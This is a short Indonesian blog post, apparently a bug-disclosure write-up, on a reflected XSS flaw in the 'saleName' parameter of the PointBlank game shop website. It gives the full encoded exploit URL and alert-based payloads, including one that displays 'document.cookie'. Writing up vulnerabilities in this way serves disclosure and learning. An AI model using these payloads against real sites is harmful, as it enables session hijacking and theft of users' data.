Reflected XSS On Website PointBlank

Oleh Fauzan

Monday, August 3, 2020

Bagikan :

Tweet

Assalamualikum, Saya Akan sedikit Sharing Penemuan Bug saya Pada Website PointBlank, Game FPS No 1 Di 

Indonesia. 

Langsung Saja Ke POC

#Reflected XSS

Setelah Menggunakan Tools Link-Crawler Saya Menemukan Parameter URL Di bawah Ini.

• https://www.pointblank.id/shop/view? idx=10004&saleType=0&saleName=

-Saya Mencoba Memasukan Value Pada Param, SaleName=

Dan Mencoba Untuk Mem Bypass Nya ">

•https://www.pointblank.id/shop/view? idx=10004&saleType=0&saleName=1234"><

Response Dari Server,

-Saya Coba lagi Untuk Memasukan Payload XSS, <svg/onload=alert(document.domain)> DAN Boom. Payload berhasil Ter eksekusi

•https://www.pointblank.id/shop/view?idx=10004&saleType=0&saleName=1234%22%3E%3Csvg/onload=alert(document.domain)%3E

Respon Dari Server,

-Saya Coba Mengambil Cookie Saya Sendiri. Dengan Payload "<script>alert(document.cookie);</script>"

XSS Ter Eksekusi,

Salam Hangat Troppers 2014

-Fauzan72

Tag : hacking, Websecurity